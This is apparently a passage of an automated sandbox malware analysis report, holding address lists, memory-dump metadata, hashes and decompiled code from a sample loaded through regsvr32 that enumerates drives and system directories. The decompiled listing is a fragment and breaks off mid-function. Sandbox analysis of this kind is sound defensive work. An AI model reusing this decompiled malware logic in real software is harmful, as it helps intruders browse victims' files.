                                                                                                                0x001b0632
                                                                                                                0x001b063a
                                                                                                                0x001b0642
                                                                                                                0x001b064f
                                                                                                                0x001b0653
                                                                                                                0x001b065b
                                                                                                                0x001b066e
                                                                                                                0x001b0675
                                                                                                                0x001b0680
                                                                                                                0x001b068b
                                                                                                                0x001b0696
                                                                                                                0x001b069e
                                                                                                                0x001b06a9
                                                                                                                0x001b06bc
                                                                                                                0x001b06c3
                                                                                                                0x001b06ce
                                                                                                                0x001b06d9
                                                                                                                0x001b06ec
                                                                                                                0x001b06f3
                                                                                                                0x001b06fe
                                                                                                                0x001b0709
                                                                                                                0x001b0714
                                                                                                                0x001b071c
                                                                                                                0x001b0727
                                                                                                                0x001b072f
                                                                                                                0x001b0734
                                                                                                                0x001b0741
                                                                                                                0x001b0745
                                                                                                                0x001b074d
                                                                                                                0x001b0758
                                                                                                                0x001b075f
                                                                                                                0x001b076a
                                                                                                                0x001b0775
                                                                                                                0x001b0785
                                                                                                                0x001b078e
                                                                                                                0x001b0799
                                                                                                                0x001b07a7
                                                                                                                0x001b07ac
                                                                                                                0x001b07b2
                                                                                                                0x001b07b7
                                                                                                                0x001b07bf
                                                                                                                0x001b07c7
                                                                                                                0x001b07d2
                                                                                                                0x001b07e2
                                                                                                                0x001b07e5
                                                                                                                0x001b07ec
                                                                                                                0x001b07f7
                                                                                                                0x001b0802
                                                                                                                0x001b080a
                                                                                                                0x001b0815
                                                                                                                0x001b0820
                                                                                                                0x001b082b
                                                                                                                0x001b0836
                                                                                                                0x001b083d
                                                                                                                0x001b0848
                                                                                                                0x001b0850
                                                                                                                0x001b0854
                                                                                                                0x001b0859
                                                                                                                0x001b085f
                                                                                                                0x001b086c
                                                                                                                0x001b086d
                                                                                                                0x001b0871
                                                                                                                0x001b0879
                                                                                                                0x001b088d
                                                                                                                0x001b0894
                                                                                                                0x001b089c
                                                                                                                0x001b08a7
                                                                                                                0x001b08b2
                                                                                                                0x001b08bd
                                                                                                                0x001b08c8
                                                                                                                0x001b08d3
                                                                                                                0x001b08de
                                                                                                                0x001b08e5
                                                                                                                0x001b08f0
                                                                                                                0x001b08fb
                                                                                                                0x001b0906
                                                                                                                0x001b0911
                                                                                                                0x001b091c
                                                                                                                0x001b0927
                                                                                                                0x001b0932
                                                                                                                0x001b093d
                                                                                                                0x001b0948
                                                                                                                0x001b0953
                                                                                                                0x001b095e
                                                                                                                0x001b0969
                                                                                                                0x001b0974
                                                                                                                0x001b097f
                                                                                                                0x001b0987
                                                                                                                0x001b0992
                                                                                                                0x001b099d
                                                                                                                0x001b09a8
                                                                                                                0x001b09b3
                                                                                                                0x001b09be
                                                                                                                0x001b09ce
                                                                                                                0x001b09d5
                                                                                                                0x001b09e0
                                                                                                                0x001b09eb
                                                                                                                0x001b09f6
                                                                                                                0x001b0a03
                                                                                                                0x001b0a0e
                                                                                                                0x001b0a19
                                                                                                                0x001b0a24
                                                                                                                0x001b0a2f
                                                                                                                0x001b0a3a
                                                                                                                0x001b0a41
                                                                                                                0x001b0a4c
                                                                                                                0x001b0a60
                                                                                                                0x001b0a65
                                                                                                                0x001b0a6c
                                                                                                                0x001b0a77
                                                                                                                0x001b0a7f
                                                                                                                0x001b0a84
                                                                                                                0x001b0a8c
                                                                                                                0x001b0a91
                                                                                                                0x001b0a99
                                                                                                                0x001b0aa1
                                                                                                                0x001b0aa9
                                                                                                                0x001b0ab1
                                                                                                                0x001b0ab9
                                                                                                                0x001b0ac1
                                                                                                                0x001b0ad6
                                                                                                                0x001b0ad9
                                                                                                                0x001b0ada
                                                                                                                0x001b0ae1
                                                                                                                0x001b0ae9
                                                                                                                0x001b0af4
                                                                                                                0x001b0aff
                                                                                                                0x001b0b07
                                                                                                                0x001b0b12
                                                                                                                0x001b0b1a
                                                                                                                0x001b0b22
                                                                                                                0x001b0b32
                                                                                                                0x001b0b36
                                                                                                                0x001b0b3e
                                                                                                                0x001b0b54
                                                                                                                0x001b0b5b
                                                                                                                0x001b0b66
                                                                                                                0x001b0b71
                                                                                                                0x001b0b79
                                                                                                                0x001b0b87
                                                                                                                0x001b0b8c
                                                                                                                0x001b0b90
                                                                                                                0x001b0b98
                                                                                                                0x001b0ba0
                                                                                                                0x001b0bb4
                                                                                                                0x001b0bbb
                                                                                                                0x001b0bc6
                                                                                                                0x001b0bd1
                                                                                                                0x001b0bdc
                                                                                                                0x001b0be7
                                                                                                                0x001b0bf2
                                                                                                                0x001b0bfa
                                                                                                                0x001b0c02
                                                                                                                0x001b0c0a
                                                                                                                0x001b0c12
                                                                                                                0x001b0c1a
                                                                                                                0x001b0c25
                                                                                                                0x001b0c30
                                                                                                                0x001b0c3b
                                                                                                                0x001b0c48
                                                                                                                0x001b0c50
                                                                                                                0x001b0c5b
                                                                                                                0x001b0c63
                                                                                                                0x001b0c6b
                                                                                                                0x001b0c73
                                                                                                                0x001b0c7b
                                                                                                                0x001b0c83
                                                                                                                0x001b0c8e
                                                                                                                0x001b0c96
                                                                                                                0x001b0ca1
                                                                                                                0x001b0cb6
                                                                                                                0x001b0cb9
                                                                                                                0x001b0cc0
                                                                                                                0x001b0ccb
                                                                                                                0x001b0cdb
                                                                                                                0x001b0ce3
                                                                                                                0x001b0ce8
                                                                                                                0x001b0cee
                                                                                                                0x001b0cf6
                                                                                                                0x001b0cfe
                                                                                                                0x001b0d09
                                                                                                                0x001b0d14
                                                                                                                0x001b0d1f
                                                                                                                0x001b0d2a
                                                                                                                0x001b0d35
                                                                                                                0x001b0d3d
                                                                                                                0x001b0d40
                                                                                                                0x001b0d47
                                                                                                                0x001b0d4f
                                                                                                                0x001b0d56
                                                                                                                0x001b0d61
                                                                                                                0x001b0d69
                                                                                                                0x001b0d76
                                                                                                                0x001b0d7a
                                                                                                                0x001b0d7f
                                                                                                                0x001b0d87
                                                                                                                0x001b0d92
                                                                                                                0x001b0d9d
                                                                                                                0x001b0da8
                                                                                                                0x001b0db3
                                                                                                                0x001b0dbe
                                                                                                                0x001b0dc6
                                                                                                                0x001b0dd1
                                                                                                                0x001b0ddc
                                                                                                                0x001b0def
                                                                                                                0x001b0df6
                                                                                                                0x001b0e01
                                                                                                                0x001b0e09
                                                                                                                0x001b0e13
                                                                                                                0x001b0e14
                                                                                                                0x001b0e18
                                                                                                                0x001b0e20
                                                                                                                0x001b0e28
                                                                                                                0x001b0e33
                                                                                                                0x001b0e3e
                                                                                                                0x001b0e49
                                                                                                                0x001b0e57
                                                                                                                0x001b0e5b
                                                                                                                0x001b0e63
                                                                                                                0x001b0e6b
                                                                                                                0x001b0e73
                                                                                                                0x001b0e80
                                                                                                                0x001b0e8b
                                                                                                                0x001b0e96
                                                                                                                0x001b0e9e
                                                                                                                0x001b0ead
                                                                                                                0x001b0eb0
                                                                                                                0x001b0eb4
                                                                                                                0x001b0eb9
                                                                                                                0x001b0ec1
                                                                                                                0x001b0ec9
                                                                                                                0x001b0ed1
                                                                                                                0x001b0ed6
                                                                                                                0x001b0edb
                                                                                                                0x001b0ee3
                                                                                                                0x001b0eee
                                                                                                                0x001b0ef9
                                                                                                                0x001b0f04
                                                                                                                0x001b0f17
                                                                                                                0x001b0f1e
                                                                                                                0x001b0f26
                                                                                                                0x001b0f31
                                                                                                                0x001b0f3c
                                                                                                                0x001b0f47
                                                                                                                0x001b0f52
                                                                                                                0x001b0f68
                                                                                                                0x001b0f6f
                                                                                                                0x001b0f7a
                                                                                                                0x001b0f85
                                                                                                                0x001b0f90
                                                                                                                0x001b0f9b
                                                                                                                0x001b0fa6
                                                                                                                0x001b0fb1
                                                                                                                0x001b0fbc
                                                                                                                0x001b0fc4
                                                                                                                0x001b0fcc
                                                                                                                0x001b0fd7
                                                                                                                0x001b0fe2
                                                                                                                0x001b0ff4
                                                                                                                0x001b0ff9
                                                                                                                0x001b1002
                                                                                                                0x001b100d
                                                                                                                0x001b101f
                                                                                                                0x001b1024
                                                                                                                0x001b102d
                                                                                                                0x001b1038
                                                                                                                0x001b1040
                                                                                                                0x001b1045
                                                                                                                0x001b1051
                                                                                                                0x001b1056
                                                                                                                0x001b105c
                                                                                                                0x001b1064
                                                                                                                0x001b1076
                                                                                                                0x001b1079
                                                                                                                0x001b1080
                                                                                                                0x001b108b
                                                                                                                0x001b1096
                                                                                                                0x001b10a1
                                                                                                                0x001b10a9
                                                                                                                0x001b10b4
                                                                                                                0x001b10c1
                                                                                                                0x001b10c9
                                                                                                                0x001b10d1
                                                                                                                0x001b10df
                                                                                                                0x001b10e4
                                                                                                                0x001b10ea
                                                                                                                0x001b10f2
                                                                                                                0x001b10fe
                                                                                                                0x001b1103
                                                                                                                0x001b1109
                                                                                                                0x001b1112
                                                                                                                0x001b1117
                                                                                                                0x001b111d
                                                                                                                0x001b1125
                                                                                                                0x001b1137
                                                                                                                0x001b113c
                                                                                                                0x001b1145
                                                                                                                0x001b1150
                                                                                                                0x001b115b
                                                                                                                0x001b1166
                                                                                                                0x001b1179
                                                                                                                0x001b117c
                                                                                                                0x001b1183
                                                                                                                0x001b118e
                                                                                                                0x001b11a4
                                                                                                                0x001b11ab
                                                                                                                0x001b11b6
                                                                                                                0x001b11be
                                                                                                                0x001b11c6
                                                                                                                0x001b11ce
                                                                                                                0x001b11d6
                                                                                                                0x001b11de
                                                                                                                0x001b11e6
                                                                                                                0x001b11ee
                                                                                                                0x001b11f3
                                                                                                                0x001b11fb
                                                                                                                0x001b1203
                                                                                                                0x001b1215
                                                                                                                0x001b121a
                                                                                                                0x001b1223
                                                                                                                0x001b122e
                                                                                                                0x001b1236
                                                                                                                0x001b1242
                                                                                                                0x001b1247
                                                                                                                0x001b1251
                                                                                                                0x001b1254
                                                                                                                0x001b1258
                                                                                                                0x001b1260
                                                                                                                0x001b126a
                                                                                                                0x001b1272
                                                                                                                0x001b127d
                                                                                                                0x001b1282
                                                                                                                0x001b1288
                                                                                                                0x001b128d
                                                                                                                0x001b1295
                                                                                                                0x001b12a1
                                                                                                                0x001b12a4
                                                                                                                0x001b12af
                                                                                                                0x001b12b3
                                                                                                                0x001b12bb
                                                                                                                0x001b12c3
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12da
                                                                                                                0x001b12dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b15f7
                                                                                                                0x001b15fd
                                                                                                                0x001b179d
                                                                                                                0x001b17a2
                                                                                                                0x00000000
                                                                                                                0x001b1603
                                                                                                                0x001b1603
                                                                                                                0x001b1605
                                                                                                                0x001b175b
                                                                                                                0x001b1762
                                                                                                                0x001b1771
                                                                                                                0x001b1773
                                                                                                                0x001b1778
                                                                                                                0x00000000
                                                                                                                0x001b160b
                                                                                                                0x001b160b
                                                                                                                0x001b1611
                                                                                                                0x001b1734
                                                                                                                0x00000000
                                                                                                                0x001b1617
                                                                                                                0x001b1617
                                                                                                                0x001b1619
                                                                                                                0x001b1653
                                                                                                                0x001b165a
                                                                                                                0x001b165f
                                                                                                                0x001b1679
                                                                                                                0x001b1682
                                                                                                                0x001b16c7
                                                                                                                0x001b16cc
                                                                                                                0x001b16cf
                                                                                                                0x001b16d3
                                                                                                                0x001b170a
                                                                                                                0x001b16d5
                                                                                                                0x001b16d5
                                                                                                                0x001b16dc
                                                                                                                0x001b16e4
                                                                                                                0x001b16e5
                                                                                                                0x001b16f7
                                                                                                                0x001b16fa
                                                                                                                0x001b16fb
                                                                                                                0x001b1700
                                                                                                                0x001b1703
                                                                                                                0x001b1703
                                                                                                                0x001b172a
                                                                                                                0x001b14cb
                                                                                                                0x001b14cb
                                                                                                                0x001b17a7
                                                                                                                0x001b17a7
                                                                                                                0x001b17aa
                                                                                                                0x001b17aa
                                                                                                                0x001b17b4
                                                                                                                0x001b161b
                                                                                                                0x001b161b
                                                                                                                0x001b1621
                                                                                                                0x001b1641
                                                                                                                0x001b1646
                                                                                                                0x001b1649
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x001b12d0
                                                                                                                0x001b12d0
                                                                                                                0x001b12d5
                                                                                                                0x001b12d5
                                                                                                                0x00000000
                                                                                                                0x001b12d5
                                                                                                                0x001b12cb
                                                                                                                0x001b1621
                                                                                                                0x001b1619
                                                                                                                0x001b1611
                                                                                                                0x001b1605
                                                                                                                0x00000000
                                                                                                                0x001b15fd
                                                                                                                0x001b12e2
                                                                                                                0x001b15e0
                                                                                                                0x001b15e5
                                                                                                                0x001b15ed
                                                                                                                0x001b15ef
                                                                                                                0x00000000
                                                                                                                0x001b12e8
                                                                                                                0x001b12ee
                                                                                                                0x001b1561
                                                                                                                0x001b1584
                                                                                                                0x001b158b
                                                                                                                0x001b159a
                                                                                                                0x001b159c
                                                                                                                0x001b15a1
                                                                                                                0x001b15a6
                                                                                                                0x00000000
                                                                                                                0x001b12f4
                                                                                                                0x001b12f6
                                                                                                                0x001b1535
                                                                                                                0x001b153c
                                                                                                                0x001b1542
                                                                                                                0x001b1544
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x00000000
                                                                                                                0x001b12cb
                                                                                                                0x001b12fc
                                                                                                                0x001b1302
                                                                                                                0x001b151d
                                                                                                                0x001b1524
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x00000000
                                                                                                                0x001b12cb
                                                                                                                0x001b1308
                                                                                                                0x001b130e
                                                                                                                0x001b14f2
                                                                                                                0x001b14f7
                                                                                                                0x001b14fa
                                                                                                                0x001b12cb
                                                                                                                0x001b12cb
                                                                                                                0x00000000
                                                                                                                0x001b12cb
                                                                                                                0x001b1314
                                                                                                                0x001b131a
                                                                                                                0x001b13e3
                                                                                                                0x001b13ea
                                                                                                                0x001b13ef
                                                                                                                0x001b1401
                                                                                                                0x001b140b
                                                                                                                0x001b1412
                                                                                                                0x001b1417
                                                                                                                0x001b1471
                                                                                                                0x001b1488
                                                                                                                0x001b1499
                                                                                                                0x001b149e
                                                                                                                0x001b14bf
                                                                                                                0x001b14c4
                                                                                                                0x00000000
                                                                                                                0x001b1320
                                                                                                                0x001b1320
                                                                                                                0x001b1326
                                                                                                                0x001b132c
                                                                                                                0x001b1333
                                                                                                                0x001b1338
                                                                                                                0x001b1338
                                                                                                                0x001b1396
                                                                                                                0x001b13c0
                                                                                                                0x001b13d1
                                                                                                                0x001b13d6
                                                                                                                0x001b13d9
                                                                                                                0x00000000
                                                                                                                0x001b13d9
                                                                                                                0x001b1326
                                                                                                                0x001b131a
                                                                                                                0x001b130e
                                                                                                                0x001b1302
                                                                                                                0x001b12f6
                                                                                                                0x001b12ee
                                                                                                                0x001b17b9
                                                                                                                0x001b17b9
                                                                                                                0x001b17d1
                                                                                                                0x001b17d1
                                                                                                                0x001b12d5
                                                                                                                0x001b12d0

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: oe$",Dt$#*$+S$1{j$6 S$6S'$7ve$=f$?aR$H$Ni$X&2$Z$\+$b3h$gG$i;H$mQ%k$n$q=6$x]$yC}$3Rj
                                                                                                                • API String ID: 0-3556981824
                                                                                                                • Opcode ID: c8c8677c8d98556b5f43d708474cdaf9a61240f7b6de3596048cfbfd34c9ddfe
                                                                                                                • Instruction ID: ad7470615160b47a11872b3e0ca17520b02d373bbfa718cff12b6fc07b92d920
                                                                                                                • Opcode Fuzzy Hash: c8c8677c8d98556b5f43d708474cdaf9a61240f7b6de3596048cfbfd34c9ddfe
                                                                                                                • Instruction Fuzzy Hash: 2E92E171508380DBD379CF65C98AB9FBBE2FBC5304F10891DE68986260DBB19959CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000F3A0 Relevance: 25.2, APIs: 11, Strings: 3, Instructions: 684threadwindowshutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1000F3A0() {
				signed int __ebx;
				long __edi;
				CHAR* __esi;
				signed int _t219;
				signed int _t221;
				signed int _t224;
				CHAR* _t230;
				intOrPtr _t242;
				CHAR** _t246;
				CHAR** _t247;
				CHAR** _t248;
				CHAR** _t249;
				CHAR** _t250;
				CHAR* _t280;
				long _t281;
				CHAR* _t282;
				signed int _t283;
				CHAR* _t286;
				signed int _t287;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				void* _t299;
				signed int _t302;
				CHAR* _t304;
				intOrPtr* _t305;
				CHAR* _t309;
				signed int** _t313;
				signed int** _t315;
				void* _t316;
				CHAR* _t322;
				CHAR* _t324;
				CHAR* _t326;
				CHAR* _t328;
				signed int _t329;
				void* _t330;
				CHAR* _t332;
				CHAR* _t333;
				CHAR* _t334;
				CHAR* _t336;
				CHAR* _t338;
				CHAR* _t340;
				CHAR* _t342;
				CHAR* _t344;
				intOrPtr _t355;
				signed int _t365;
				CHAR* _t367;
				CHAR* _t370;
				char* _t371;
				CHAR* _t373;
				CHAR* _t378;
				signed int _t379;
				CHAR* _t391;
				char* _t398;
				signed int _t402;
				signed int _t404;
				void* _t409;
				long _t410;
				signed int _t412;
				void* _t414;
				signed int* _t415;
				void* _t417;
				signed int _t418;
				void* _t420;
				signed int _t423;
				intOrPtr* _t430;

				_push(0xffffffff);
				_push(E10051F58);
				_push( *[fs:0x0]);
				_t418 = _t417 - 0xd8;
				_t219 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t418 + 0xd4) = _t219 ^ _t418;
				_push(_t329);
				_push(_t415);
				_push(_t413);
				_push(_t407);
				_t221 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t221 ^ _t418);
				 *[fs:0x0] = _t418 + 0xec;
				_t331 =  *0x1006f050; // 0x0
				_t421 =  *((intOrPtr*)(_t331 + 0x264));
				if( *((intOrPtr*)(_t331 + 0x264)) != 0) {
					L15:
					_t224 =  *(_t418 + 0xfc);
					_t436 = _t224 - 6;
					if(_t224 > 6) {
						E1002181C(_t329, _t407, _t413, __eflags, "Error in Fun_mycomputer", 0, 0);
						goto L82;
					} else {
						switch( *((intOrPtr*)(_t224 * 4 +  &M1000FE28))) {
							case 0:
								goto L19;
							case 1:
								_push(__ecx);
								__ecx = __esp;
								 *(__esp + 0x18) = __esp;
								_push("C:\\Documents and Settings");
								goto L30;
							case 2:
								__ebx = GetLogicalDriveStringsA;
								__edi = GetLogicalDriveStringsA(0, 0);
								_t69 = __edi + 1; // 0x1
								__ecx = _t69;
								__esi = E100160EC(__eflags, _t69);
								__eax = GetLogicalDriveStringsA(__edi, __esi);
								__edi = __edi + 0xffffffff;
								__eflags = __eax - __edi;
								if(__eflags != 0) {
									goto L20;
								} else {
									__eax = __esi;
									_t70 = __eax + 1; // 0x1
									__edx = _t70;
									do {
										__cl =  *__eax;
										__eax = __eax + 1;
										__eflags = __cl;
									} while (__cl != 0);
									__eax = __eax - __edx;
									__eflags = __eax;
									__edi = __eax;
									if(__eflags != 0) {
										__ebx = GetDriveTypeA;
										do {
											__eax = GetDriveTypeA(__esi);
											__eflags = __eax - 3;
											if(__eax == 3) {
												__ecx = __esp;
												 *(__esp + 0x18) = __esp;
												__eax = E10005030(__edx, __ebp, __esi);
												__ecx =  *0x1006f050; // 0x0
												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
											}
											__esi =  &(__esi[__edi + 1]);
											__eax = __esi;
											__edx = __eax + 1;
											do {
												__cl =  *__eax;
												__eax = __eax + 1;
												__eflags = __cl;
											} while (__cl != 0);
											__eax = __eax - __edx;
											__eflags = __eax;
											__edi = __eax;
										} while (__eflags != 0);
									}
									goto L82;
								}
								goto L107;
							case 3:
								__ecx =  *0x1006f050;
								__eax = E1000CD90(__eflags);
								 *(__esp + 0x1c) = __eax;
								__eax =  *(__eax + 8);
								__ebx = 0;
								__eflags = __eax;
								 *(__esp + 0x14) = __eax;
								if(__eflags <= 0) {
									goto L82;
								} else {
									while(1) {
										__eax = E100173A6();
										__ecx = 0;
										__eflags = __eax;
										__ecx = 0 | __eax != 0x00000000;
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L17;
										}
										__edx =  *__eax;
										__ecx = __eax;
										 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
										__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
										 *(__esp + 0x24) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
										__eflags = __ebx;
										 *(__esp + 0xf4) = 3;
										if(__eflags < 0) {
											goto L18;
										} else {
											__ecx =  *(__esp + 0x1c);
											__eflags = __ebx - __ecx[8];
											if(__eflags >= 0) {
												goto L18;
											} else {
												__edx = __ecx;
												__ecx[4] = __ecx[4] + __ebx * 4;
												_push(__ecx[4] + __ebx * 4);
												__ecx = __esp + 0x28;
												__eax = E10001FF0(__esp + 0x28);
												__ecx =  *0x1006f050; // 0x0
												__esi =  *(__esp + 0x24);
												__ecx =  &(__ecx[0x4fc]);
												__eax = E1001D2C4(__ecx, __esi);
												_push(__ecx);
												__ebp = __esi - 0x10;
												 *(__esp + 0x24) = __esp;
												__edi = __esp;
												__eax = E10001080(__ebx, __ebp);
												__esp = __esp + 4;
												__eax = __eax + 0x10;
												__ecx = __esp + 0x1c;
												 *__edi = __eax;
												__ecx =  *0x1006f050; // 0x0
												__eax = E1000E6F0(__ecx, __edx, __eflags, __esp + 0x1c);
												__edx =  *(__esp + 0x18);
												 *((char*)(__esp + 0xfc)) = 4;
												__eax = E1003BD06(__edx, 0x10056948);
												__eflags = __eax;
												__eax = __eax & 0xffffff00 | __eax != 0x00000000;
												__eflags = __al;
												if(__al != 0) {
													__eax =  *0x1006f050; // 0x0
													__edx =  *(__eax + 0x10ec);
													_t98 = __eax + 0x358; // 0x358
													__ecx = _t98;
													__eax = E10026562(_t98, 1,  *(__eax + 0x10ec), 0x10056948, 0, 0, 0, 0);
													__eax =  *0x1006f050; // 0x0
													__ecx =  *(__eax + 0x10ec);
													_t100 = __eax + 0x358; // 0x358
													__ecx = _t100;
													__eax = E1002637C(_t100,  *(__eax + 0x10ec), 0, __esi);
													__edx =  *(__esp + 0x18);
													__eax =  *0x1006f050; // 0x0
													__ecx =  *(__eax + 0x10ec);
													_t103 = __eax + 0x358; // 0x358
													__ecx = _t103;
													__eax = E1002637C(_t103,  *(__eax + 0x10ec), 1, __edx);
													__eax =  *0x1006f050; // 0x0
													_t104 = __eax + 0x10ec;
													 *_t104 =  *(__eax + 0x10ec) + 1;
													__eflags =  *_t104;
												}
												__eax =  *0x1006f050; // 0x0
												 *(__eax + 0x10e8) =  *(__eax + 0x10e8) + 1;
												__eax = E100173A6();
												__ecx = 0;
												__eflags = __eax;
												__ecx = 0 | __eax != 0x00000000;
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L17;
												} else {
													__edx =  *__eax;
													__ecx = __eax;
													 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
													__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
													 *(__esp + 0x20) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
													__eax =  *0x1006f050; // 0x0
													__ecx =  *(__eax + 0x10f0);
													__edx =  *(__eax + 0x10ec);
													__eax =  *(__eax + 0x10e8);
													_push(__ecx);
													_push(__edx);
													__ecx = __esp + 0x2c;
													 *((char*)(__esp + 0x108)) = 5;
													__eax = E10003500(__esp + 0x2c, 0x1005873c, __eax);
													__ecx =  *0x1006f050; // 0x0
													__esi =  *(__esp + 0x34);
													__ecx =  &(__ecx[0x304]);
													__eax = E1001D2C4(__ecx, __esi);
													__eax = __esi - 0x10;
													 *(__esp + 0xf4) = 4;
													__edx = __eax + 0xc;
													__ecx = __ecx | 0xffffffff;
													asm("lock xadd [edx], ecx");
													__ecx = __ecx - 1;
													__eflags = __ecx;
													if(__ecx <= 0) {
														__ecx =  *__eax;
														__edx =  *( *__eax);
														_push(__eax);
														 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))();
													}
													__eax =  *(__esp + 0x18);
													__eax =  *(__esp + 0x18) + 0xfffffff0;
													 *(__esp + 0xf4) = 3;
													__ecx = __eax + 0xc;
													__edx = __edx | 0xffffffff;
													asm("lock xadd [ecx], edx");
													__edx = __edx - 1;
													__eflags = __edx;
													if(__edx <= 0) {
														__ecx =  *__eax;
														__edx =  *( *__eax);
														_push(__eax);
														 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))();
													}
													 *(__esp + 0xf4) = 0xffffffff;
													__ecx =  &(__ebp[3]);
													__edx = __edx | 0xffffffff;
													asm("lock xadd [ecx], edx");
													__edx = __edx - 1;
													__eflags = __edx;
													if(__edx <= 0) {
														__ecx =  *__ebp;
														__eax =  *__ecx;
														__edx =  *( *__ecx + 4);
														_push(__ebp);
														__eax =  *__edx();
													}
													__ebx = __ebx + 1;
													__eflags = __ebx -  *(__esp + 0x14);
													if(__eflags < 0) {
														continue;
													} else {
														goto L82;
													}
												}
											}
										}
										goto L107;
									}
									goto L17;
								}
								goto L107;
							case 4:
								__esp + 0xb8 = GetWindowsDirectoryA(__esp + 0xb8, 0x32);
								__ecx = __esp + 0x84;
								__eax = GetSystemDirectoryA(__esp + 0x84, 0x32);
								__edx = __esp + 0xb8;
								__ecx = __esp;
								 *(__esp + 0x18) = __esp;
								__eax = E10005030(__edx, __ebp, __edx);
								__ecx =  *0x1006f050; // 0x0
								E1000EC00(__ecx, __edx, __eflags, __ecx) = __esp + 0x80;
								__ecx = __esp + 0xb8;
								__eflags = E1003C520(__ecx, __ecx, __esp + 0x80);
								if(__eflags != 0) {
									_push(__ecx);
									__edx = __esp + 0x84;
									__ecx = __esp;
									 *(__esp + 0x18) = __esp;
									_push(__edx);
									L30:
									__eax = E10005030(__edx, __ebp);
									__ecx =  *0x1006f050; // 0x0
									__eax = E1000EC00(__ecx, __edx, __eflags);
								}
								goto L82;
							case 5:
								__ebx = GetLogicalDriveStringsA;
								__edi = GetLogicalDriveStringsA(0, 0);
								_t138 = __edi + 1; // 0x1
								__eax = _t138;
								__esi = E100160EC(__eflags, _t138);
								__eax = GetLogicalDriveStringsA(__edi, __esi);
								__edi = __edi + 0xffffffff;
								__eflags = __eax - __edi;
								if(__eflags != 0) {
									goto L20;
								} else {
									__eax = __esi;
									_t139 = __eax + 1; // 0x1
									__edx = _t139;
									do {
										__cl =  *__eax;
										__eax = __eax + 1;
										__eflags = __cl;
									} while (__cl != 0);
									__eax = __eax - __edx;
									__eflags = __eax;
									__edi = __eax;
									if(__eflags != 0) {
										__ebx = GetDriveTypeA;
										do {
											__eax = GetDriveTypeA(__esi);
											__eflags = __eax - 5;
											if(__eax == 5) {
												__ecx = __esp;
												 *(__esp + 0x18) = __esp;
												__eax = E10005030(__edx, __ebp, __esi);
												__ecx =  *0x1006f050; // 0x0
												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
											}
											__esi =  &(__esi[__edi + 1]);
											__eax = __esi;
											__edx = __eax + 1;
											do {
												__cl =  *__eax;
												__eax = __eax + 1;
												__eflags = __cl;
											} while (__cl != 0);
											__eax = __eax - __edx;
											__eflags = __eax;
											__edi = __eax;
										} while (__eflags != 0);
									}
									goto L82;
								}
								goto L107;
							case 6:
								__ebx = GetLogicalDriveStringsA;
								__edi = GetLogicalDriveStringsA(0, 0);
								_t144 = __edi + 1; // 0x1
								__ecx = _t144;
								__esi = E100160EC(__eflags, _t144);
								__eax = GetLogicalDriveStringsA(__edi, __esi);
								__edi = __edi + 0xffffffff;
								__eflags = __eax - __edi;
								if(__eflags != 0) {
									goto L20;
								} else {
									__eax = __esi;
									_t145 = __eax + 1; // 0x1
									__edx = _t145;
									do {
										__cl =  *__eax;
										__eax = __eax + 1;
										__eflags = __cl;
									} while (__cl != 0);
									__eax = __eax - __edx;
									__eflags = __eax;
									__edi = __eax;
									if(__eflags != 0) {
										__ebx = GetDriveTypeA;
										do {
											__eax = GetDriveTypeA(__esi);
											__eflags = __eax - 2;
											if(__eax == 2) {
												__ecx = __esp;
												 *(__esp + 0x18) = __esp;
												__eax = E10005030(__edx, __ebp, __esi);
												__ecx =  *0x1006f050; // 0x0
												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
											}
											__esi =  &(__esi[__edi + 1]);
											__eax = __esi;
											__edx = __eax + 1;
											do {
												__cl =  *__eax;
												__eax = __eax + 1;
												__eflags = __cl;
											} while (__cl != 0);
											__eax = __eax - __edx;
											__eflags = __eax;
											__edi = __eax;
										} while (__eflags != 0);
									}
									goto L82;
								}
								goto L107;
						}
					}
				} else {
					_t289 = E1000CD90(_t421);
					 *(_t418 + 0x20) = _t289;
					_t290 =  *((intOrPtr*)(_t289 + 8));
					_t329 = 0;
					 *(_t418 + 0x14) = _t290;
					if(_t290 <= 0) {
						goto L15;
					} else {
						while(1) {
							_t291 = E100173A6();
							_t423 = _t291;
							_t331 = 0 | _t423 != 0x00000000;
